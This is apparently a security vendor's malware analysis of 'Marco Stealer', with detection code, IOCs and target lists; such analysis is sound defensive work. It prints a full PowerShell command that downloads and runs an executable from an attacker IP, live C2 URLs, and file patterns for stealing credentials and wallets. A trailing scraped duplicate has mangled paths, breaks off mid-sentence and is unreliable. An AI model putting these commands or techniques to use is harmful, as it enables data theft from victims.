Introduction

Zscaler ThreatLabz has discovered an information stealer that we named Marco Stealer, which was first observed in June 2025. Marco Stealer primarily targets browser data, cryptocurrency wallet information, files from popular cloud services like Dropbox and Google Drive, and other sensitive files stored on the victim's system. Marco Stealer implements several anti-analysis techniques, including string encryption and terminating security tools. The malware leverages HTTP for command-and-control (C2), with messages encrypted using 256-bit AES.

Key Takeaways

- ThreatLabz discovered Marco Stealer in June 2025, an information stealer that focuses on exfiltrating browser data, cryptocurrency wallet information from browser extensions, and sensitive files (both locally and from cloud services).
- Marco Stealer builds a profile of the victim's machine by collecting system information such as hardware ID and operating system version, as well as the victim's IP address and geographical location.
- Marco Stealer uses named pipes to establish communication between its various components.
- Marco Stealer relies on encrypted strings that are decrypted only at runtime to avoid static analysis. In addition, the information stealer uses Windows APIs to detect anti-analysis tools like Wireshark, x64dbg, and Process Hacker.
- Stolen data is encrypted using AES-256 before being sent to C2 servers via HTTP POST requests.

Attack Chain

The attack chain below shows how a campaign may deliver Marco Stealer to a victim's system.

Figure 1: Attack chain depicting the execution flow in campaigns delivering Marco Stealer.

Technical Analysis

This section provides a breakdown of Marco Stealer's functionality, including its downloader, anti-analysis mechanisms, data collection techniques, and methods for exfiltrating stolen information.

Downloader

The downloader component decrypts multiple strings using AES-128 in ECB mode to generate a PowerShell command, which it executes as a child process to initiate the next stage of the attack. An example of the decrypted PowerShell command is shown below.

cmdline:
powershell.exe -ExecutionPolicy ByPass -Command "$client = New-Object System.Net.WebClient; $client.Headers.Add('X-Custom-Auth', 'eyJhbGciOiJJUzI1NiIsInR5cCI6IkpXVCJ9.c2FzdGVkX2NyZWRzXzg5N2E0OWIyZjZjNGViZDc1ZWQzNDlkNzI4MTc2NWRiX2MzOGVhYTQw'); $client.Headers.Add('User-Agent', 'Zephyr-Downloader/3.7.18-zx9b (Compatible; QuartzCore/945; SageBridge/XRT-71a)'); $client.DownloadFile('http://217.156.50.228:8181/nujbOqrNYyLXXLmOhPpY/PNcWncSY.exe', 'C:\Users\PJones\AppData\Local\Temp\knmQSGUZFILhFvaZ.exe'); Start-Process 'C:\Users\PJones\AppData\Local\Temp\knmQSGUZFILhFvaZ.exe'"

In this example, the WebClient object downloads the Marco Stealer executable from the URL http[:/]/217[.]156[.]50[.]228[:]8181/nujbOqrNYyLXXLmOhPpY/PNcWncSY.exe to the temporary path AppData\Local\Temp\knmQSGUZFILhFvaZ.exe and executes it.

Marco Stealer

Marco Stealer samples have the Program Database (PDB) file path C:\Users\marco\Desktop\Builder\Builder\Client\Client\x64\Release\Client.pdb. When Marco Stealer is executed, the malware creates a static mutex named Global\ItsMeRavenOnYourMachineed to ensure that only a single instance runs on the infected system at any given time.

Anti-analysis techniques

Marco Stealer leverages encrypted strings throughout its operations. These encrypted strings are used in nearly all functions and are decrypted at execution time. The string encryption algorithm is add-rotate-XOR (ARX) based and similar to ChaCha20. The full string decryption algorithm can be found in the ThreatLabz GitHub repository.

Using Windows APIs, Marco Stealer enumerates running processes and retrieves their executable file paths. Once the paths are identified, the information stealer extracts the version metadata from the files, which includes:

- OriginalFilename
- ProductName
- CompanyName

To collect this metadata, Marco Stealer queries the following version-information paths:

- \VarFileInfo\Translation determines the language and code page of the file.
- \StringFileInfo\<LANG><CODEPAGE> provides access to the fields listed above.

If any of the metadata collected matches the name of a common anti-analysis tool such as x64dbg, Wireshark, Process Hacker, or OllyDbg, Marco Stealer terminates the corresponding process to evade analysis. Visit the Appendix section at the end of this blog for a comprehensive list of the anti-analysis tools targeted by Marco Stealer.

Following the initial checks, Marco Stealer verifies internet connectivity by attempting to reach https://www.google.com.
If the machine is offline or the connection check fails, the information stealer initiates a self-deletion routine, removing its executable from the system and terminating its process. If the connectivity check succeeds, Marco Stealer begins gathering IP geolocation data. The information stealer queries services like https://ipinfo.io/ip and https://ipinfo.io/country to retrieve the external IP address and country code of the victim's machine, which are sent to the C2 server.

System data collection

After confirming internet connectivity, Marco Stealer initiates data collection to build a profile of the victim's machine. The information stealer begins by querying the machine GUID from the Windows registry, generating a unique hardware identifier that serves as an infection identifier. All data gathered by Marco Stealer is encrypted using AES before being sent individually to the C2 server. The initial data transmission includes a client ID (hardcoded in each sample), hardware ID, and IP address. This information is also prepended to the exfiltration of any subsequent data collected by Marco Stealer. Notably, screenshot data was the only instance observed where plaintext information was exfiltrated. Visit the Appendix section at the end of this blog for a list of the data collected by Marco Stealer.

Marco Stealer looks for antivirus software by scanning the Windows Security Center registry path (ROOT\SecurityCenter2). The malware performs Component Object Model (COM) interactions using DllCanUnloadNow and runs a Windows Management Instrumentation (WMI) query (SELECT * FROM AntiVirusProduct) to enumerate all active antivirus products installed on the device.

Marco Stealer also collects installed software by querying specific registry keys, including:

- SOFTWARE\Microsoft\
- SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products
- \Windows\CurrentVersion\Uninstaller

From these registry locations, Marco Stealer extracts application names by reading the DisplayName value present in each subkey.

Marco Stealer identifies all active processes on the system. It uses the QueryFullProcessImageNameW API to obtain the full file paths of running processes.

Browser data exfiltration

Marco Stealer employs two distinct functions designed to exfiltrate browser data, leveraging two embedded files: chromeDecryptor.dll and needme.exe. These files are stored in the information stealer's resource section. Marco Stealer first creates a directory in %appdata%\local\temp, using the Mersenne Twister algorithm to generate a unique path. The malware then extracts the embedded files from the resource section and stores them in this newly created directory for further execution.

Exfiltration via Chrome Appbound (chromeDecryptor.dll)

The first method focuses on exfiltrating data from browser processes and involves the following steps:

1. Marco Stealer enumerates all running processes, comparing them against a list of Chromium-based browser process names. If any matches are found, those processes are terminated.
2. Marco Stealer extracts an executable from the resource section and drops it in the temporary directory as chromeDecryptor.dll. It sets an environment variable, Browser_TYPE, with chrome as the assigned value.
3. Marco Stealer attempts to create a headless instance of the targeted Chromium-based browser. Upon successful creation, the information stealer injects chromeDecryptor.dll into the process using DLL injection techniques.
4. The primary function of chromeDecryptor.dll is to decrypt the encryption key stored by the Chrome browser at AppData\Local\Google\Chrome\User Data\Local State.
5. Once the decrypted key is retrieved, it is written to the file chrome_appbound_key.txt.
6. The decrypted key is then used to query browser data stored in SQLite databases.

Data collection via named pipe (needMe.exe)

The second method of data collection involves named pipes. Marco Stealer initiates exfiltration by enumerating and terminating instances of various browsers, including lesser-known ones such as Basilisk, CLIQZ, and Pale Moon. After this process is complete, Marco Stealer extracts the previously mentioned needMe.exe executable. Next, Marco Stealer establishes a named pipe, \\.\pipe\FirefoxBrowserExtractor, configured for bidirectional communication (PIPE_ACCESS_DUPLEX) with a buffer size of 8192 bytes (0x2000). The pipe waits for a client connection, which is later initiated by needMe.exe. Once connected, the pipe allows the malware to ingest browser-related data from the remote process.

The needMe.exe binary targets browser-related data stored in SQLite databases under paths such as:

- C:\Users\<username>\AppData\Roaming\Basilisk-Dev\Basilisk\Profiles
- C:\Users\<username>\AppData\Roaming\CLIQZ\Profiles
- C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles
- C:\Users\<username>\AppData\Roaming\FlashPeak\SlimBrowser\Profiles
- C:\Users\<username>\AppData\Roaming\Moonchild Productions\Pale Moon\Profiles

Cryptocurrency wallet data extraction using extensions

Marco Stealer focuses on extracting cryptocurrency wallet data from Chromium-based browsers. A comprehensive list of targeted browsers is available in the Appendix section at the end of this blog. Marco Stealer scans typical user data directories under paths such as:

- C:\Users\<username>\AppData\Local\<browser>\User Data

Once Marco Stealer identifies target directories, it validates their existence using the GetFileAttributes API. Upon locating extension directories containing cryptocurrency wallet data, the information stealer extracts, encrypts, and exfiltrates the data to a C2 server.

Data collected across popular services

Marco Stealer collects data from different software, applications, and services. Visit the Appendix section of this blog for a comprehensive table that includes the file paths or registry keys targeted, the data collected, and additional technical details clarifying how this data is leveraged or encrypted/decoded.

Additional data theft

Clipboard content is also targeted, with Marco Stealer harvesting any sensitive information copied by the user. Marco Stealer is also capable of capturing screenshots, and is designed to recursively search a wide range of commonly used local directories and cloud service locations for sensitive files, such as:

- AppData\Local
- Desktop
- Documents
- Downloads
- Pictures
- Videos
- Music
- OneDrive
- Dropbox
- Google Drive
- Microsoft\OneDrive
- Microsoft\Office
- Dropbox

The information stealer looks for files with names or extensions that are likely to contain confidential information. Visit the Appendix section at the end of this blog for a table that shows the targeted file patterns (text, documents, spreadsheets, database, images, and backup files) identified using keywords.

C2 communication

Marco Stealer uses AES-256 CBC encryption to protect stolen data that is sent to its C2 server. To begin the encryption process, the information stealer generates a SHA-256 hash of a hardcoded value. The resulting hash is used to derive an AES-256 encryption key via the CryptDeriveKey function. While the AES encryption key is derived dynamically, the result is always the same, so the actual key is static. The encrypted data, including the victim's client ID and hardware ID, is then sent to the predefined C2 endpoint (e.g., http://45.74.19[.]20:49259/receive) via an HTTP POST request with the HTTP User-Agent field set to DataSender.

The data in the HTTP body is sent in the following format (prior to encryption):

Client ID: [client_id]
Hardware ID: [hwid]
IP Address: [ip_addr]
Stolen data
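As an added defender-side example (not ThreatLabz code), the Python below turns the indicators from the downloader, named-pipe and C2 sections into simple triage checks over constructed process, pipe and proxy events, and splits a decrypted POST body into the header fields listed above. The event field names, the placeholder token and the host stage.invalid are assumptions.

```python
import re
from dataclasses import dataclass

# Indicators quoted in the write-up above.
C2_USER_AGENT = "DataSender"
C2_PATH = "/receive"
C2_PORT = 49259
NAMED_PIPE = r"\\.\pipe\FirefoxBrowserExtractor"
DOWNLOADER_UA_PREFIX = "Zephyr-Downloader/"

# Traits of the decrypted downloader command line: policy bypass, a WebClient
# fetch with a custom auth header into %TEMP%, then Start-Process on the drop.
_DOWNLOADER_TRAITS = {
    "policy_bypass": re.compile(r"-ExecutionPolicy\s+ByPass", re.I),
    "webclient": re.compile(r"New-Object\s+System\.Net\.WebClient", re.I),
    "custom_auth_header": re.compile(r"""Headers\.Add\(\s*['"]X-Custom-Auth['"]""", re.I),
    "drop_to_temp": re.compile(r"""DownloadFile\(.*?\\Temp\\[^'"]+\.exe""", re.I | re.S),
    "start_drop": re.compile(r"""Start-Process\s+['"][^'"]*\\Temp\\[^'"]*['"]""", re.I),
}

@dataclass(frozen=True)
class Finding:
    source: str  # telemetry type the match came from
    rule: str    # short rule name
    detail: str  # value that triggered the rule

def downloader_traits(cmdline: str) -> list[str]:
    """Return the names of the downloader traits present in a command line."""
    return [name for name, rx in _DOWNLOADER_TRAITS.items() if rx.search(cmdline)]

def check_process(event: dict) -> list[Finding]:
    """Process-creation event with 'Image' and 'CommandLine' fields (assumed names)."""
    if "powershell" not in event.get("Image", "").lower():
        return []
    traits = downloader_traits(event.get("CommandLine", ""))
    # A single trait is common in admin scripts; three together is a strong match.
    if len(traits) >= 3:
        return [Finding("process", "marco_downloader_cmdline", ",".join(traits))]
    return []

def check_pipe(event: dict) -> list[Finding]:
    """Named-pipe creation event with a 'PipeName' field (assumed name)."""
    name = event.get("PipeName", "")
    # Compare only the final component so both \\.\pipe\X and bare X forms match.
    if name.lower().rsplit("\\", 1)[-1] == NAMED_PIPE.rsplit("\\", 1)[-1].lower():
        return [Finding("pipe", "marco_named_pipe", name)]
    return []

def check_http(event: dict) -> list[Finding]:
    """Proxy log entry with method, host, port, path and user_agent (assumed names)."""
    out = []
    ua = event.get("user_agent", "")
    is_post = event.get("method") == "POST" and event.get("path") == C2_PATH
    if is_post and ua == C2_USER_AGENT:
        out.append(Finding("http", "marco_c2_post", f"{event.get('host')}:{event.get('port')}"))
    if ua.startswith(DOWNLOADER_UA_PREFIX):
        out.append(Finding("http", "marco_downloader_ua", ua))
    return out

def triage(events: list[dict]) -> list[Finding]:
    """Run the matching check for each event, keyed by its 'type' field."""
    checks = {"process": check_process, "pipe": check_pipe, "http": check_http}
    found: list[Finding] = []
    for ev in events:
        found.extend(checks.get(ev.get("type"), lambda _e: [])(ev))
    return found

def parse_exfil_body(plaintext: str) -> dict:
    """Split a decrypted POST body into its three header lines and the stolen data."""
    labels = {"Client ID": "client_id", "Hardware ID": "hwid", "IP Address": "ip"}
    fields = {"client_id": None, "hwid": None, "ip": None, "payload": ""}
    lines = plaintext.splitlines()
    i = 0
    while i < len(lines):
        label, sep, value = lines[i].partition(": ")
        if not sep or label not in labels:
            break  # first non-header line starts the stolen data
        fields[labels[label]] = value.strip()
        i += 1
    fields["payload"] = "\n".join(lines[i:])
    return fields

# Constructed sample telemetry modelled on the write-up; not real captures.
DOWNLOADER_CMDLINE = (
    "powershell.exe -ExecutionPolicy ByPass -Command \"$client = New-Object System.Net.WebClient; "
    "$client.Headers.Add('X-Custom-Auth', 'TOKEN_PLACEHOLDER'); "
    "$client.DownloadFile('http://stage.invalid:8181/PNcWncSY.exe', "
    "'C:\\Users\\PJones\\AppData\\Local\\Temp\\knmQSGUZFILhFvaZ.exe'); "
    "Start-Process 'C:\\Users\\PJones\\AppData\\Local\\Temp\\knmQSGUZFILhFvaZ.exe'\""
)
SAMPLE_EVENTS = [
    {"type": "process", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": DOWNLOADER_CMDLINE},
    {"type": "pipe", "PipeName": r"\\.\pipe\FirefoxBrowserExtractor"},
    {"type": "http", "method": "POST", "host": "203.0.113.10", "port": 49259,
     "path": "/receive", "user_agent": "DataSender"},
]
```

Running triage(SAMPLE_EVENTS) yields one finding per sample event; a benign "-ExecutionPolicy ByPass -File ..." command line scores only one trait and is not flagged.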
Conclusion

Marco Stealer is a new information stealer designed to steal browser data, cryptocurrency wallet information, and sensitive files (both locally and from cloud services). The malware employs string encryption and attempts to defeat dynamic analysis tools. Network communications are protected by AES-256 encryption to transmit stolen data over HTTP. Despite recent law enforcement actions that have taken aim at several information stealers such as Rhadamanthys and Lumma, the market for these malware tools remains significant. As a result, new information stealers are regularly being created and continue to pose significant threats to corporate environments.

Zscaler Coverage

The Zscaler Cloud Sandbox has been successful in detecting this campaign. The figure below depicts the Zscaler Cloud Sandbox, showing detection details for Marco Stealer.

Figure 2: Zscaler Cloud Sandbox report for Marco Stealer.

In addition to sandbox detections, Zscaler's multilayered cloud security platform detects indicators related to this campaign at various levels with the following threat names:

- Win64.Downloader.Marco
- Win64.PWS.Marco

Indicators Of Compromise (IOCs)

IOC | Type
http[:/]/217[.]156[.]50[.]228[:]8185/LoqnOOuuIsTIYfkrdsfL/eUelHAyY.exe | Downloading URL
34deb6594098545d7ffb98844f0790bf | ZIP
3a3e8f6bc70748a39ffc047b3c86a665 | ZIP
5eb91d1ad26c7eced894e34710aaa28e | ZIP
1042affb0ca6758ca0043112cdc7eda2 | Downloader
a98fa5fba55e470750ae74186c15fa73 | Downloader
33dd8a5e234d911391cc8c301dc4a606 | Downloader
49ab8d4c55b7f64eaba699ef0dc9054b | Marco Stealer
661a5465d9a322276ebc414f39891a8b | Marco Stealer
028604d6aa556de2ae4ca6b31e600677 | Marco Stealer
http[://]107[.]189[.]25[.]189[:]49259/receive | C2 server
http[://]45[.]74[.]19[.]20[:]49259/receive | C2 server

MITRE ATT&CK Framework

Tactic | ID | Technique Name | Description
Execution, Defense Evasion, Discovery | T1047 | Windows Management Instrumentation | Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and scripts, collect information about the system, or to establish persistence.
Discovery | T1016 | System Network Configuration Discovery | Adversaries may attempt to get information about the network configuration of a system or systems, including IP address, DNS servers, and network adapters.
Command and Control | T1071 | Application Layer Protocol | Adversaries may communicate using application layer protocols to avoid detection, blend in with legitimate network traffic, or enable C2 on a network that restricts other protocols.
Execution | T1059 | Command and Scripting Interpreter | Adversaries may abuse command and scripting interpreters to execute commands, scripts, or binaries. These interpreters are often pre-installed on systems, such as cmd.exe, PowerShell, or Python.
Discovery | T1057 | Process Discovery | Adversaries may attempt to get information about running processes on a system. This information can be used to identify security solutions, analyze running services, or to find processes that can be injected.
Execution, Command and Control | T1105 | Ingress Tool Transfer | Adversaries may transfer tools or other files from an external system into a compromised environment. This can be done via various means, including HTTP/S, FTP, SMB, or custom protocols.
Discovery | T1082 | System Information Discovery | Adversaries may attempt to get detailed information about the operating system and hardware, including the system's name, version, and architecture. This information helps in further planning and execution of attacks.
Command and Control | T1573 | Encrypted Channel | Adversaries may communicate using a channel that has been encrypted to conceal the content of their traffic. This can be done using standard encryption protocols like TLS/SSL or custom encryption schemes.
Discovery | T1518.001 | Security Software Discovery | Adversaries may attempt to get information about installed security software and tools, such as antivirus, EDR solutions, or firewalls. This helps them identify potential defenses to bypass or disable.

Appendix

Anti-analysis tools

The table below includes a comprehensive list of the anti-analysis tools targeted by Marco Stealer, matched by the version metadata described earlier.

- Cheat Engine
- dnspy
- ILSpy
- Wireshark
- Process Monitor
- VB PCode Decompiler
- Process Hacker
- WinHex
- PE Explorer
- Dumpcap
- Malware Initial Assessment
- Decompiler for p-code and native code files
- Common File Format Explorer
- Hex Workshop
- W32Dasm for Windows
- HxD Hex Editor
- DB Browser for SQLite
- mega dump
- ollydbg
- Interactive Delphi Reconstructor
- The InteractiveDisassembler
- x64dbg
- Hacker's Disassembler
- System Informer
- Navicat Premium
- 3Stud_PE MFC Application
- The Interactive Disassembler
- ExEinfo PE – Win32 exe identifier
- Java(TM) Platform SE binary
- System activity monitor
- Regshot 1.9.0 x86
- Sysinternals Process Explorer
- Autostart program viewer
- Resource viewer
- Sysinternals Tcp View
- Regshot 1.9.0 x64 ANSI
- OpenJDK Platform binary
- API Monitor v2 (Alpha) 32-bit
- Regshot 1.9.0 x64 Unicode
- Tiny AutoIt3 Decompiler Editor
- API Monitor v2 (Alpha) 64-bit
- Regshot 1.9.0 x86 Unicode
- EnigmaVBUnpacker – static Enigma Virtual Box unpacker
- 010 Editor – Pro Text/Hex Editor
- PiD Team's Protection ID.-bit
- Nauz File Detector(NFD) is a linker/compiler/packer identifier utility
- Restorator: Edit Resources and User Interface

System data collected

The table below lists the data collected by Marco Stealer.

- Client ID
- Hardware ID
- IP address
- Country code
- OS version
- Local date
- Time zone
- ComputerNameA
- UserNameA
- Hostname
- ComputerNameNetBIOS
- Language
- Antivirus software
- RAM size
- CPU vendor
- CPU name
- CPU threads
- CPU cores
- GPU(s)
- Display resolution
- Installed software
- Running processes
- Clipboard content
- Screenshot data

Targeted file patterns

The following tables show the targeted file patterns (text, documents, spreadsheets, database, images, and backup files) identified using keywords.

Private information:
*private*.txt, *secret*.txt, *important*.txt, *note*.txt, *data*.txt

Credentials and authentication:
*password*.doc, *pass*.txt, *login*.txt, *cred*.txt, *auth*.txt, *2fa*.txt, *otp*.txt, *account*.xls, *ssn*.txt
Cryptocurrency-related data:
*wallet*.txt, *bitcoin*.txt, *btc*.txt, *eth*.txt, *ledger*.txt, *trezor*.txt, *metamask*.txt, *coinbase*.txt, *binance*.txt, *exodus*.txt, *electrum*.txt, *trust*.txt, *seed*.png

Financial data:
*bank*.jpg, *card*.jpg, *invoice*.pdf, *tax*.pdf, *backup*.sql, *account*.accdb

Password manager files:
*.kbdx, *.kdb, *.1pif, *.opvault, *.agilekeychain, *.lastpass, *.dashlane

Screenshots or captured images:
*screen*.jpg, *printscreen*.jpg, *screenshot*.png, *snip*.png, *capture*.png

Popular services

The following table includes the file paths or registry keys targeted, the data collected, and additional technical details clarifying how this data is leveraged or encrypted/decoded.

Function name | File/registry path | Data collected | Additional information
Discord Data | AppData\Roaming\Discord\Local Storage\leveldb; AppData\Roaming\Discordptb\Local Storage\leveldb; AppData\Roaming\Discordcanary\Local Storage\leveldb; AppData\Roaming\Lightcord\Local Storage\leveldb | Tokens, cookies, and more | Marco Stealer retrieves file metadata using structure members like nFileSizeLow, nFileSizeHigh, ftLastWriteTime, and dwFileAttributes, which help determine file presence, modification timestamps, and other file system attributes before attempting to read or extract the data.
Telegram Data | AppData\Roaming\Telegram Desktop\tdata | countries, key_datas, prefix, settings, shortcuts-custom.json, shortcuts-default.json, usertag, content | The decryption keys are stored locally in key_datas.
Steam Video Game | Software\Valve\Steam; Software\Valve\Steam\config\config.vdf | Contents of config.vdf | To parse the contents of config.vdf, Marco Stealer employs the regular expression "([^"]*)"\s+"([^"]*)".
Proton VPN | AppData\Local\Proton\Proton VPN | Data under "Proton\Proton VPN" | Marco Stealer performs a memory scan in the backward direction, searching for ProtonVPN-associated URLs like "ProtonVPN_Url" and content artifacts.
FileZilla | %APPDATA%\FileZilla | recentservers.xml, sitemanager.xml | These XML files store FTP connection profiles, including host, port, username, and password fields, in plaintext or Base64-encoded plaintext.
Windscribe | HKEY_CURRENT_USER\Software\Windscribe\Installer; HKEY_CURRENT_USER\Software\Windscribe\Windscribe2 | Sensitive fields like authHash, userId, wireguardConfig, and customOvpnAuths | These fields contain hashed credentials, unique user identifiers, VPN configuration for both OpenVPN and WireGuard, and internal VPN engine or networking settings.
Ubisoft Game Launcher | AppData\Local\Ubisoft Game Launcher | All files at Ubisoft Game Launcher.* |
Battle.net | AppData\Local\Battle.net | ".config" and ".db" at the given path | Marco Stealer specifically looks for critical files such as ".config" and ".db", which may contain sensitive configuration or database information.
Outlook | Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676 | SMTP Email Address2, SMTP Server, POP3 User Name9, NNTP Email Address, NNTP User Name, IMAP Server, IMAP User Name, Email, HTTP User, HTTP Server URL, POP3 User, IMAP User, HTTPMail User Name, HTTPMail Server, SMTP User, POP3 Password2, IMAP Password2, NNTP Password2, HTTPMail Password2, SMTP Password2, POP3 Password, IMAP Password, NNTP Password, and HTTPMail Password | After decrypting the strings listed here, Marco Stealer enumerates them, indicating that this functionality enumerates user email profile information from the registry.
Password Manager | Appdata\Local\ (could be different for different password managers) | 1Password Nightly, commonkey, dashlane, KeePassXC, Keeper, LastPass, MYKI, NordPass, RoboForm, Splikity, Zoho Vault, 1Password Beta, Bitwarden | By locating and accessing the data directories or configuration files associated with these applications, Marco Stealer attempts to extract saved credentials.

Targeted browsers

The following table is a comprehensive list of the browsers targeted by Marco Stealer.

- Google Chrome
- Epic Privacy Browser
- AVAST Software Browser
- Lenovo SLBrowser
- BraveSoftware
- Google Chrome Dev
- CentBrowser
- Comodo Dragon
- BlackHawk Browser
- Coowon Coowon
- Google Chrome Beta
- Google Chrome SxS
- Blisk
- CryptoTab Browser
- AVG Browser
- InsomniacBrowser
- CCleaner Browser
- LiebaoAI
- Chromium
- CatalinaGroup Citrio
- CocCoc Browser
- Microsoft Edge Dev
- Microsoft Edge

​[#item_full_content] [[{“value”:”IntroductionZscaler ThreatLabz has discovered an information stealer that we named Marco Stealer, which was first observed in June 2025. Marco Stealer primarily targets browser data, cryptocurrency wallet information, files from popular cloud services like Dropbox and Google Drive, and other sensitive files stored on the victim’s system. Marco Stealer implements several anti-analysis techniques including string encryption and terminating security tools. The malware leverages HTTP for command-and-control (C2) with messages encrypted with 256-bit AES.Key TakeawaysThreatLabz discovered Marco Stealer in June 2025, an information stealer that focuses on exfiltrating browser data, cryptocurrency wallet information from browser extensions, and sensitive files (both locally and from cloud services).Marco Stealer builds a profile of the victim’s machine by collecting system information such as hardware ID and operating system version, as well as the victim’s IP address and geographical location.Marco Stealer uses named pipes to establish communication between its various components.Marco Stealer relies on encrypted strings that are decrypted only at runtime to avoid static analysis. 
In addition, the information stealer uses Windows APIs to detect anti-analysis tools like Wireshark, x64dbg, and Process Hacker.Stolen data is encrypted using AES-256 before being sent to C2 servers via HTTP POST requests.Attack ChainThe attack chain below shows how a campaign may deliver Marco Stealer to a victim’s system.Figure 1: Attack chain depicting the execution flow in campaigns delivering Marco Stealer.Technical AnalysisThis section provides a breakdown of Marco Stealer’s functionality, including its downloader, anti-analysis mechanisms, data collection techniques, and methods for exfiltrating stolen information.Downloader The downloader component decrypts multiple strings using AES-128 in ECB mode to generate a PowerShell command, which it executes as a child process to initiate the next stage of the attack. An example of the decrypted PowerShell command is shown below.cmdline:powershell.exe -ExecutionPolicy ByPass -Command “$client = New-Object System.Net.WebClient; $client.Headers.Add(‘X-Custom-Auth’, ‘eyJhbGciOiJJUzI1NiIsInR5cCI6IkpXVCJ9.c2FzdGVkX2NyZWRzXzg5N2E0OWIyZjZjNGViZDc1ZWQzNDlkNzI4MTc2NWRiX2MzOGVhYTQw’);
$client.Headers.Add(‘User-Agent’, ‘Zephyr-Downloader/3.7.18-zx9b (Compatible; QuartzCore/945; SageBridge/XRT-71a)’); $client.DownloadFile(‘http://217.156.50.228:8181/nujbOqrNYyLXXLmOhPpY/PNcWncSY.exe’, ‘C:UsersPJonesAppDataLocalTempknmQSGUZFILhFvaZ.exe’);
Start-Process ‘C:UsersPJonesAppDataLocalTempknmQSGUZFILhFvaZ.exe'”In this example, the WebClient object downloads the Marco Stealer executable file from the URL http[:/]/217[.]156[.]50[.]228[:]8181/nujbOqrNYyLXXLmOhPpY/PNcWncSY.exe to the temporary path AppDataLocalTempknmQSGUZFILhFvaZ.exe and executes it.Marco StealerMarco Stealer samples have the Program Database (PDB) file path C:UsersmarcoDesktopBuilderBuilderClientClientx64ReleaseClient.pdb. When Marco Stealer is executed, the malware employs a static mutex named GlobalItsMeRavenOnYourMachineed to ensure that only a single instance runs on the infected system at any given time.Anti-analysis techniques Marco Stealer leverages encrypted strings throughout its operations. These encrypted strings are used in nearly all functions and decrypted on execution. The string encryption algorithm is an add–rotate–XOR (ARX) based similar to ChaCha20. The full string decryption algorithm can be found in the ThreatLabz GitHub repository. Using Windows APIs, Marco Stealer enumerates running processes and retrieves their executable file paths. Once the paths are identified, the information stealer extracts the version metadata from the files, which includes:OriginalFilenameProductNameCompanyNameTo collect this metadata, Marco Stealer queries the following paths:VarFileInfoTranslation determines the language and code page of the file.StringFileInfoLANGCODEPAGE provides access to the fields listed above.If any of the metadata collected matches the name of a common anti-analysis tool such as x64dbg, Wireshark, Process Hacker, or OllyDbg, Marco Stealer terminates the corresponding process to evade analysis. Visit the Appendix section at the end of this blog for a comprehensive list of anti-analysis tools targeted by Marco Stealer.Following the initial checks, Marco Stealer verifies internet connectivity by attempting to reach https://www.google.com. 
If the machine is offline or the connection check fails, the information stealer initiates a self-deletion routine, removing its executable from the system and terminating its process. If the connectivity check succeeds, Marco Stealer begins gathering IP geolocation data. The information stealer queries services like https://ipinfo.io/ip and https://ipinfo.io/country to retrieve the external IP address and country code of the victim’s machine, which is sent to the C2 server.System data collectionAfter confirming internet connectivity, Marco Stealer initiates data collection to build a profile of the victim’s machine. The information stealer begins by querying the machine GUID from the Windows registry, generating a unique hardware identifier that serves as an infection identifier. All data gathered by Marco Stealer is encrypted using AES before being sent individually to the C2 server. The initial data transmission includes a client ID (hardcoded in each sample), hardware ID, and IP address. This information is also prepended to the exfiltration of any subsequent data collected by Marco stealer. Notably, screenshot data was the only instance observed where plaintext information was exfiltrated. Visit the Appendix section at the end of this blog for a list of the data collected by Marco Stealer.Marco Stealer looks for antivirus software by scanning the Windows Security Center registry path (ROOTSecurityCenter2). 
The malware performs Component Object Model (COM) interactions using DllCanUnloadNow and runs a Windows Management Instrumentation (WMI) query (SELECT * FROM AntiVirusProduct) to enumerate all active antivirus products installed on the device.Marco Stealer also collects installed software by querying specific registry keys, including: SOFTWAREMicrosoft”SOFTWAREMicrosoftWindowsCurrentVersionInstallerUserDataS-1-5-18ProductsWindowsCurrentVersionUninstaller  From these registry locations, Marco Stealer extracts application names by reading the DisplayName field present in each subkey.Marco Stealer identifies all active processes on the system. It uses the QueryFullProcessImageNameW API to obtain the full file paths of running processes. Browser data exfiltrationMarco Stealer employs two distinct functions designed to exfiltrate browser data, leveraging two embedded files: chromeDecryptor.dll and needme.exe. These files are stored in the information stealer’s resource section. Marco Stealer first creates a directory in %appdata%localtemp, using the Mersenne Twister algorithm to generate a unique path. The malware then extracts the embedded files from the resource section and stores them in this newly created directory for further execution.Exfiltration via Chrome Appbound (chromeDecryptor.dll)The first method focuses on exfiltrating data from browser processes and involves the following steps:Marco Stealer enumerates all running processes, comparing them against a list of Chromium-based browser process names. If any matches are found, those processes are terminated.Marco Stealer extracts an executable from the resource section and drops it in the temporary directory as chromeDecryptor.dll. It sets an environment variable, Browser_TYPE, with chrome as the assigned value.Marco Stealer attempts to create a headless instance of the targeted Chromium-based browser. 
Upon successful creation, the information stealer injects chromeDecryptor.dll into the process using DLL injection techniques.The primary function of chromeDecryptor.dll is to decrypt the encryption key stored in the Chrome browser at AppDataLocalGoogleChromeUser DataLocal State.Once the decrypted key is retrieved, it is written to the file chrome_appbound_key.txt.The decrypted key is then used to query browser data stored in SQLite databases.Data collection via named pipe (needMe.exe)The second method of data collection involves named pipes. Marco Stealer initiates exfiltration by enumerating and terminating instances of various browsers, including lesser-known ones such as Basilisk, CLIQZ, and Pale Moon. After this process is complete, Marco Stealer extracts the previously mentioned needMe.exe executable. Next, Marco Stealer establishes a named pipe, \.pipeFirefoxBrowserExtractor, configured with bidirectional communication (PIPE_ACCESS_DUPLEX) and a buffer size of 8192 bytes (0x2000). The pipe waits for a client connection, which is later initiated by needMe.exe. When connected, the pipe enables the malware to ingest browser-related data from remote processes.The needMe.exe binary targets browser-related data stored in SQLite databases such as:C:Users\AppDataRoamingBasilisk-DevBasiliskProfilesC:Users\AppDataRoamingCLIQZProfilesC:Users\AppDataRoamingMozillaFirefoxProfilesC:Users\AppDataRoamingFlashPeakSlimBrowserProfilesC:Users\AppDataRoamingMoonchild ProductionsPale MoonProfilesCryptocurrency wallet data extraction using extensionsMarco Stealer focuses on extracting cryptocurrency wallet data in Chromium-based browsers. A comprehensive list of targeted browsers is available in the Appendix section at the end of this blog.Marco Stealer scans typical user data directories under paths such as:C:Users\AppDataLocal\User DataOnce Marco Stealer identifies target directories, it validates their existence using the GetFileAttributes API. 
